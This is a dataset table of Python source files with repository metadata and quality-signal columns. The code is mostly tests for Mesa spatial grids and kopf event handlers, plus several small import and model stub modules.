hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
29aacf80016d63ff924addbb422a6547bbb26697 | 31 | py | Python | unipy_db/core/api.py | pydemia/unipy_db | dafbecf1acc576a17f5ee99de3878a8869f777ce | [
"MIT"
] | 1 | 2017-01-10T14:55:49.000Z | 2017-01-10T14:55:49.000Z | unipy/core/api.py | LogSigma/unipy | 57eba620795eefba6b97ad4e3cd3e56c35912f2a | [
"MIT"
] | null | null | null | unipy/core/api.py | LogSigma/unipy | 57eba620795eefba6b97ad4e3cd3e56c35912f2a | [
"MIT"
] | 2 | 2019-09-20T15:25:01.000Z | 2021-02-27T02:47:08.000Z |
from unipy.plots.api import *
| 10.333333 | 29 | 0.741935 | 5 | 31 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 31 | 2 | 30 | 15.5 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29abe51cdfa363acc07888052e902d921d841f23 | 104 | py | Python | app/models/Post.py | itsumura-h/masonite_admin_dev | 8e17a517d17c87b0514e8d79960bbadb278b3fc9 | [
"MIT"
] | null | null | null | app/models/Post.py | itsumura-h/masonite_admin_dev | 8e17a517d17c87b0514e8d79960bbadb278b3fc9 | [
"MIT"
] | 15 | 2020-09-04T23:42:15.000Z | 2022-02-26T15:06:26.000Z | app/models/Post.py | itsumura-h/masonite_admin | 8e17a517d17c87b0514e8d79960bbadb278b3fc9 | [
"MIT"
] | null | null | null | """Post Model."""
from config.database import Model
class Post(Model):
"""Post Model."""
pass | 13 | 33 | 0.625 | 13 | 104 | 5 | 0.615385 | 0.415385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201923 | 104 | 8 | 34 | 13 | 0.783133 | 0.221154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
d9a282d97f495224f1d6c68e6a448991ab64d140 | 158 | py | Python | busy_beaver/apps/github_integration/blueprint.py | alysivji/github-adapter | 5e3543f41f189fbe4a50d64e3d6734dc765579b4 | [
"MIT"
] | 55 | 2019-05-05T01:20:58.000Z | 2022-01-10T18:03:05.000Z | busy_beaver/apps/github_integration/blueprint.py | alysivji/github-adapter | 5e3543f41f189fbe4a50d64e3d6734dc765579b4 | [
"MIT"
] | 222 | 2019-05-03T16:31:26.000Z | 2021-08-28T23:49:03.000Z | busy_beaver/apps/github_integration/blueprint.py | busy-beaver-dev/busy-beaver | 5e3543f41f189fbe4a50d64e3d6734dc765579b4 | [
"MIT"
] | 19 | 2019-04-27T19:49:32.000Z | 2020-06-30T19:52:09.000Z | from flask import blueprints
github_bp = blueprints.Blueprint("github", __name__)
from . import api # noqa isort:skip
from . import cli # noqa isort:skip
| 22.571429 | 52 | 0.753165 | 22 | 158 | 5.181818 | 0.590909 | 0.175439 | 0.22807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164557 | 158 | 6 | 53 | 26.333333 | 0.863636 | 0.196203 | 0 | 0 | 0 | 0 | 0.048387 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
d9aee17849a1db5750f81ab5814de6c44bd8c7e0 | 34 | py | Python | python3/pracmln/wcsp/__init__.py | seba90/pracmln | 2af9e11d72f077834cf130343a2506344480fb07 | [
"BSD-2-Clause"
] | 123 | 2016-02-13T08:49:46.000Z | 2022-03-15T10:23:55.000Z | python3/pracmln/wcsp/__init__.py | seba90/pracmln | 2af9e11d72f077834cf130343a2506344480fb07 | [
"BSD-2-Clause"
] | 29 | 2016-06-13T16:06:50.000Z | 2022-01-07T23:31:22.000Z | python3/pracmln/wcsp/__init__.py | seba90/pracmln | 2af9e11d72f077834cf130343a2506344480fb07 | [
"BSD-2-Clause"
] | 51 | 2016-03-22T05:42:45.000Z | 2021-11-06T17:36:01.000Z | from .wcsp import WCSP, Constraint | 34 | 34 | 0.823529 | 5 | 34 | 5.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9b6cc577c06632d4c6eacce29553b863321c9ea | 37 | py | Python | core/__init__.py | jdlar1/ray_tracing | 9a63858ee4918c477532d7484a6b09c87682e6dd | [
"MIT"
] | 1 | 2020-12-28T21:32:23.000Z | 2020-12-28T21:32:23.000Z | core/__init__.py | jdlar1/ray_tracing | 9a63858ee4918c477532d7484a6b09c87682e6dd | [
"MIT"
] | null | null | null | core/__init__.py | jdlar1/ray_tracing | 9a63858ee4918c477532d7484a6b09c87682e6dd | [
"MIT"
] | null | null | null | from .optic_path import OpticalSystem | 37 | 37 | 0.891892 | 5 | 37 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 37 | 1 | 37 | 37 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9f1017742ff77216e94ab2e50d7e9a071bf0457 | 14,915 | py | Python | tests/test_space.py | DoofCoder/mesa | b290439e4f68a1a5a4906246546b69e7d783dcfb | [
"Apache-2.0"
] | 6 | 2019-12-21T21:15:54.000Z | 2021-04-20T17:35:24.000Z | tests/test_space.py | DoofCoder/mesa | b290439e4f68a1a5a4906246546b69e7d783dcfb | [
"Apache-2.0"
] | 40 | 2019-08-07T13:57:52.000Z | 2022-03-18T05:21:42.000Z | tests/test_space.py | DoofCoder/mesa | b290439e4f68a1a5a4906246546b69e7d783dcfb | [
"Apache-2.0"
] | 2 | 2017-07-17T15:25:41.000Z | 2022-03-31T07:00:41.000Z | import unittest
import networkx as nx
import numpy as np
import pytest
from mesa.space import ContinuousSpace
from mesa.space import SingleGrid
from mesa.space import NetworkGrid
from tests.test_grid import MockAgent
TEST_AGENTS = [(-20, -20), (-20, -20.05), (65, 18)]
TEST_AGENTS_GRID = [(1, 1), (10, 0), (10, 10)]
TEST_AGENTS_NETWORK_SINGLE = [0, 1, 5]
TEST_AGENTS_NETWORK_MULTIPLE = [0, 1, 1]
OUTSIDE_POSITIONS = [(70, 10), (30, 20), (100, 10)]
REMOVAL_TEST_AGENTS = [
(-20, -20),
(-20, -20.05),
(65, 18),
(0, -11),
(20, 20),
(31, 41),
(55, 32),
]
class TestSpaceToroidal(unittest.TestCase):
"""
Testing a toroidal continuous space.
"""
def setUp(self):
"""
Create a test space and populate with Mock Agents.
"""
self.space = ContinuousSpace(70, 20, True, -30, -30)
self.agents = []
for i, pos in enumerate(TEST_AGENTS):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_agent_positions(self):
"""
Ensure that the agents are all placed properly.
"""
for i, pos in enumerate(TEST_AGENTS):
a = self.agents[i]
assert a.pos == pos
def test_agent_matching(self):
"""
Ensure that the agents are all placed and indexed properly.
"""
for i, agent in self.space._index_to_agent.items():
assert agent.pos == tuple(self.space._agent_points[i, :])
assert i == self.space._agent_to_index[agent]
def test_distance_calculations(self):
"""
Test toroidal distance calculations.
"""
pos_1 = (-30, -30)
pos_2 = (70, 20)
assert self.space.get_distance(pos_1, pos_2) == 0
pos_3 = (-30, -20)
assert self.space.get_distance(pos_1, pos_3) == 10
pos_4 = (20, -5)
pos_5 = (20, -15)
assert self.space.get_distance(pos_4, pos_5) == 10
pos_6 = (-30, -29)
pos_7 = (21, -5)
assert self.space.get_distance(pos_6, pos_7) == np.sqrt(49 ** 2 + 24 ** 2)
def test_heading(self):
pos_1 = (-30, -30)
pos_2 = (70, 20)
self.assertEqual((0, 0), self.space.get_heading(pos_1, pos_2))
pos_1 = (65, -25)
pos_2 = (-25, -25)
self.assertEqual((10, 0), self.space.get_heading(pos_1, pos_2))
def test_neighborhood_retrieval(self):
"""
Test neighborhood retrieval
"""
neighbors_1 = self.space.get_neighbors((-20, -20), 1)
assert len(neighbors_1) == 2
neighbors_2 = self.space.get_neighbors((40, -10), 10)
assert len(neighbors_2) == 0
neighbors_3 = self.space.get_neighbors((-30, -30), 10)
assert len(neighbors_3) == 1
def test_bounds(self):
"""
Test positions outside of boundary
"""
boundary_agents = []
for i, pos in enumerate(OUTSIDE_POSITIONS):
a = MockAgent(len(self.agents) + i, None)
boundary_agents.append(a)
self.space.place_agent(a, pos)
for a, pos in zip(boundary_agents, OUTSIDE_POSITIONS):
adj_pos = self.space.torus_adj(pos)
assert a.pos == adj_pos
a = self.agents[0]
for pos in OUTSIDE_POSITIONS:
assert self.space.out_of_bounds(pos)
self.space.move_agent(a, pos)
class TestSpaceNonToroidal(unittest.TestCase):
"""
Testing a toroidal continuous space.
"""
def setUp(self):
"""
Create a test space and populate with Mock Agents.
"""
self.space = ContinuousSpace(70, 20, False, -30, -30)
self.agents = []
for i, pos in enumerate(TEST_AGENTS):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_agent_positions(self):
"""
Ensure that the agents are all placed properly.
"""
for i, pos in enumerate(TEST_AGENTS):
a = self.agents[i]
assert a.pos == pos
def test_agent_matching(self):
"""
Ensure that the agents are all placed and indexed properly.
"""
for i, agent in self.space._index_to_agent.items():
assert agent.pos == tuple(self.space._agent_points[i, :])
assert i == self.space._agent_to_index[agent]
def test_distance_calculations(self):
"""
Test toroidal distance calculations.
"""
pos_2 = (70, 20)
pos_3 = (-30, -20)
assert self.space.get_distance(pos_2, pos_3) == 107.70329614269008
def test_heading(self):
pos_1 = (-30, -30)
pos_2 = (70, 20)
self.assertEqual((100, 50), self.space.get_heading(pos_1, pos_2))
pos_1 = (65, -25)
pos_2 = (-25, -25)
self.assertEqual((-90, 0), self.space.get_heading(pos_1, pos_2))
def test_neighborhood_retrieval(self):
"""
Test neighborhood retrieval
"""
neighbors_1 = self.space.get_neighbors((-20, -20), 1)
assert len(neighbors_1) == 2
neighbors_2 = self.space.get_neighbors((40, -10), 10)
assert len(neighbors_2) == 0
neighbors_3 = self.space.get_neighbors((-30, -30), 10)
assert len(neighbors_3) == 0
def test_bounds(self):
"""
Test positions outside of boundary
"""
for i, pos in enumerate(OUTSIDE_POSITIONS):
a = MockAgent(len(self.agents) + i, None)
with self.assertRaises(Exception):
self.space.place_agent(a, pos)
a = self.agents[0]
for pos in OUTSIDE_POSITIONS:
assert self.space.out_of_bounds(pos)
with self.assertRaises(Exception):
self.space.move_agent(a, pos)
class TestSpaceAgentMapping(unittest.TestCase):
"""
Testing a continuous space for agent mapping during removal.
"""
def setUp(self):
"""
Create a test space and populate with Mock Agents.
"""
self.space = ContinuousSpace(70, 50, False, -30, -30)
self.agents = []
for i, pos in enumerate(REMOVAL_TEST_AGENTS):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_remove_first(self):
"""
Test removing the first entry
"""
agent_to_remove = self.agents[0]
self.space.remove_agent(agent_to_remove)
for i, agent in self.space._index_to_agent.items():
assert agent.pos == tuple(self.space._agent_points[i, :])
assert i == self.space._agent_to_index[agent]
assert agent_to_remove not in self.space._agent_to_index
assert agent_to_remove.pos is None
with self.assertRaises(Exception):
self.space.remove_agent(agent_to_remove)
def test_remove_last(self):
"""
Test removing the last entry
"""
agent_to_remove = self.agents[-1]
self.space.remove_agent(agent_to_remove)
for i, agent in self.space._index_to_agent.items():
assert agent.pos == tuple(self.space._agent_points[i, :])
assert i == self.space._agent_to_index[agent]
assert agent_to_remove not in self.space._agent_to_index
assert agent_to_remove.pos is None
with self.assertRaises(Exception):
self.space.remove_agent(agent_to_remove)
def test_remove_middle(self):
"""
Test removing a middle entry
"""
agent_to_remove = self.agents[3]
self.space.remove_agent(agent_to_remove)
for i, agent in self.space._index_to_agent.items():
assert agent.pos == tuple(self.space._agent_points[i, :])
assert i == self.space._agent_to_index[agent]
assert agent_to_remove not in self.space._agent_to_index
assert agent_to_remove.pos is None
with self.assertRaises(Exception):
self.space.remove_agent(agent_to_remove)
class TestSingleGrid(unittest.TestCase):
def setUp(self):
self.space = SingleGrid(50, 50, False)
self.agents = []
for i, pos in enumerate(TEST_AGENTS_GRID):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_agent_positions(self):
"""
Ensure that the agents are all placed properly.
"""
for i, pos in enumerate(TEST_AGENTS_GRID):
a = self.agents[i]
assert a.pos == pos
def test_remove_agent(self):
for i, pos in enumerate(TEST_AGENTS_GRID):
a = self.agents[i]
assert a.pos == pos
assert self.space.grid[pos[0]][pos[1]] == a
self.space.remove_agent(a)
assert a.pos is None
assert self.space.grid[pos[0]][pos[1]] is None
def test_empty_cells(self):
if self.space.exists_empty_cells():
pytest.deprecated_call(self.space.find_empty)
for i, pos in enumerate(list(self.space.empties)):
a = MockAgent(-i, pos)
self.space.position_agent(a, x=pos[0], y=pos[1])
assert self.space.find_empty() is None
with self.assertRaises(Exception):
self.space.move_to_empty(a)
def move_agent(self):
agent_number = 0
initial_pos = TEST_AGENTS_GRID[agent_number]
final_pos = (7, 7)
_agent = self.agents[agent_number]
assert _agent.pos == initial_pos
assert self.space.grid[initial_pos[0]][initial_pos[1]] == _agent
assert self.space.grid[final_pos[0]][final_pos[1]] is None
self.space.move_agent(_agent, final_pos)
assert _agent.pos == final_pos
assert self.space.grid[initial_pos[0]][initial_pos[1]] is None
assert self.space.grid[final_pos[0]][final_pos[1]] == _agent
class TestSingleNetworkGrid(unittest.TestCase):
GRAPH_SIZE = 10
def setUp(self):
"""
Create a test network grid and populate with Mock Agents.
"""
G = nx.complete_graph(TestSingleNetworkGrid.GRAPH_SIZE)
self.space = NetworkGrid(G)
self.agents = []
for i, pos in enumerate(TEST_AGENTS_NETWORK_SINGLE):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_agent_positions(self):
"""
Ensure that the agents are all placed properly.
"""
for i, pos in enumerate(TEST_AGENTS_NETWORK_SINGLE):
a = self.agents[i]
assert a.pos == pos
def test_get_neighbors(self):
assert (
len(self.space.get_neighbors(0, include_center=True))
== TestSingleNetworkGrid.GRAPH_SIZE
)
assert (
len(self.space.get_neighbors(0, include_center=False))
== TestSingleNetworkGrid.GRAPH_SIZE - 1
)
def test_move_agent(self):
initial_pos = 1
agent_number = 1
final_pos = TestSingleNetworkGrid.GRAPH_SIZE - 1
_agent = self.agents[agent_number]
assert _agent.pos == initial_pos
assert _agent in self.space.G.nodes[initial_pos]["agent"]
assert _agent not in self.space.G.nodes[final_pos]["agent"]
self.space.move_agent(_agent, final_pos)
assert _agent.pos == final_pos
assert _agent not in self.space.G.nodes[initial_pos]["agent"]
assert _agent in self.space.G.nodes[final_pos]["agent"]
def test_is_cell_empty(self):
assert not self.space.is_cell_empty(0)
assert self.space.is_cell_empty(TestSingleNetworkGrid.GRAPH_SIZE - 1)
def test_get_cell_list_contents(self):
assert self.space.get_cell_list_contents([0]) == [self.agents[0]]
assert self.space.get_cell_list_contents(
list(range(TestSingleNetworkGrid.GRAPH_SIZE))
) == [self.agents[0], self.agents[1], self.agents[2]]
def test_get_all_cell_contents(self):
assert self.space.get_all_cell_contents() == [
self.agents[0],
self.agents[1],
self.agents[2],
]
class TestMultipleNetworkGrid(unittest.TestCase):
GRAPH_SIZE = 3
def setUp(self):
"""
Create a test network grid and populate with Mock Agents.
"""
G = nx.complete_graph(TestMultipleNetworkGrid.GRAPH_SIZE)
self.space = NetworkGrid(G)
self.agents = []
for i, pos in enumerate(TEST_AGENTS_NETWORK_MULTIPLE):
a = MockAgent(i, None)
self.agents.append(a)
self.space.place_agent(a, pos)
def test_agent_positions(self):
"""
Ensure that the agents are all placed properly.
"""
for i, pos in enumerate(TEST_AGENTS_NETWORK_MULTIPLE):
a = self.agents[i]
assert a.pos == pos
def test_get_neighbors(self):
assert (
len(self.space.get_neighbors(0, include_center=True))
== TestMultipleNetworkGrid.GRAPH_SIZE
)
assert (
len(self.space.get_neighbors(0, include_center=False))
== TestMultipleNetworkGrid.GRAPH_SIZE - 1
)
def test_move_agent(self):
initial_pos = 1
agent_number = 1
final_pos = 0
_agent = self.agents[agent_number]
assert _agent.pos == initial_pos
assert _agent in self.space.G.nodes[initial_pos]["agent"]
assert _agent not in self.space.G.nodes[final_pos]["agent"]
assert len(self.space.G.nodes[initial_pos]["agent"]) == 2
assert len(self.space.G.nodes[final_pos]["agent"]) == 1
self.space.move_agent(_agent, final_pos)
assert _agent.pos == final_pos
assert _agent not in self.space.G.nodes[initial_pos]["agent"]
assert _agent in self.space.G.nodes[final_pos]["agent"]
assert len(self.space.G.nodes[initial_pos]["agent"]) == 1
assert len(self.space.G.nodes[final_pos]["agent"]) == 2
def test_is_cell_empty(self):
assert not self.space.is_cell_empty(0)
assert not self.space.is_cell_empty(1)
assert self.space.is_cell_empty(2)
def test_get_cell_list_contents(self):
assert self.space.get_cell_list_contents([0]) == [self.agents[0]]
assert self.space.get_cell_list_contents([1]) == [
self.agents[1],
self.agents[2],
]
assert self.space.get_cell_list_contents(
list(range(TestMultipleNetworkGrid.GRAPH_SIZE))
) == [self.agents[0], self.agents[1], self.agents[2]]
def test_get_all_cell_contents(self):
assert self.space.get_all_cell_contents() == [
self.agents[0],
self.agents[1],
self.agents[2],
]
if __name__ == "__main__":
unittest.main()
| 32.636761 | 82 | 0.598994 | 1,956 | 14,915 | 4.355317 | 0.0818 | 0.107759 | 0.036624 | 0.015847 | 0.827562 | 0.825449 | 0.79129 | 0.773917 | 0.761122 | 0.715812 | 0 | 0.033672 | 0.287161 | 14,915 | 456 | 83 | 32.708333 | 0.767588 | 0.070466 | 0 | 0.647249 | 0 | 0 | 0.005099 | 0 | 0 | 0 | 0 | 0 | 0.28479 | 1 | 0.119741 | false | 0 | 0.02589 | 0 | 0.171521 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9f25c9f9e40bed1feb7860d121873d3d67abcdb | 119 | py | Python | np cOMPLETENESS/school_bus/test.py | lovroselic/Coursera | 1598b4fe02eb3addbc847f4f3ec21fb5b6e0be08 | [
"MIT"
] | null | null | null | np cOMPLETENESS/school_bus/test.py | lovroselic/Coursera | 1598b4fe02eb3addbc847f4f3ec21fb5b6e0be08 | [
"MIT"
] | null | null | null | np cOMPLETENESS/school_bus/test.py | lovroselic/Coursera | 1598b4fe02eb3addbc847f4f3ec21fb5b6e0be08 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 1 12:55:49 2020
@author: SELICLO1
"""
print(min([(106, 1), (62, 2)])) | 14.875 | 35 | 0.546218 | 20 | 119 | 3.25 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206186 | 0.184874 | 119 | 8 | 36 | 14.875 | 0.463918 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d9fc40199f475beedf2a643dfc035d6ec2a0571a | 1,724 | py | Python | tests/handling/test_parametrization.py | brennerm/kopf | f13fdd3fa8d71dd3f18f32cc6ee279bb70e5dd58 | [
"MIT"
] | null | null | null | tests/handling/test_parametrization.py | brennerm/kopf | f13fdd3fa8d71dd3f18f32cc6ee279bb70e5dd58 | [
"MIT"
] | null | null | null | tests/handling/test_parametrization.py | brennerm/kopf | f13fdd3fa8d71dd3f18f32cc6ee279bb70e5dd58 | [
"MIT"
] | null | null | null | import asyncio
from unittest.mock import Mock
import kopf
from kopf.reactor.processing import process_resource_event
from kopf.structs.containers import ResourceMemories
async def test_parameter_is_passed_when_specified(resource, cause_mock, registry, settings):
mock = Mock()
# If it works for this handler, we assume it works for all of them.
# Otherwise, it is too difficult to trigger the actual invocation.
@kopf.on.event(*resource, param=123)
def fn(**kwargs):
mock(**kwargs)
event_queue = asyncio.Queue()
await process_resource_event(
lifecycle=kopf.lifecycles.all_at_once,
registry=registry,
settings=settings,
resource=resource,
memories=ResourceMemories(),
raw_event={'type': None, 'object': {}},
replenished=asyncio.Event(),
event_queue=event_queue,
)
assert mock.called
assert mock.call_args_list[0][1]['param'] == 123
async def test_parameter_is_passed_even_if_not_specified(resource, cause_mock, registry, settings):
mock = Mock()
# If it works for this handler, we assume it works for all of them.
# Otherwise, it is too difficult to trigger the actual invocation.
@kopf.on.event(*resource)
def fn(**kwargs):
mock(**kwargs)
event_queue = asyncio.Queue()
await process_resource_event(
lifecycle=kopf.lifecycles.all_at_once,
registry=registry,
settings=settings,
resource=resource,
memories=ResourceMemories(),
raw_event={'type': None, 'object': {}},
replenished=asyncio.Event(),
event_queue=event_queue,
)
assert mock.called
assert mock.call_args_list[0][1]['param'] is None
| 30.245614 | 99 | 0.683875 | 216 | 1,724 | 5.291667 | 0.324074 | 0.052493 | 0.034996 | 0.036745 | 0.845144 | 0.845144 | 0.794401 | 0.794401 | 0.794401 | 0.794401 | 0 | 0.007418 | 0.218097 | 1,724 | 56 | 100 | 30.785714 | 0.840504 | 0.151392 | 0 | 0.682927 | 0 | 0 | 0.020576 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.04878 | false | 0.04878 | 0.121951 | 0 | 0.170732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a1da31c56cee43e0f06f859b8d47682854b42c2 | 98 | py | Python | pysal/model/__init__.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2021-08-16T02:47:35.000Z | 2021-08-16T02:47:35.000Z | pysal/model/__init__.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | null | null | null | pysal/model/__init__.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2016-11-11T19:20:51.000Z | 2016-11-11T19:20:51.000Z | from . import spreg
from . import spglm
from . import spint
from . import mgwr
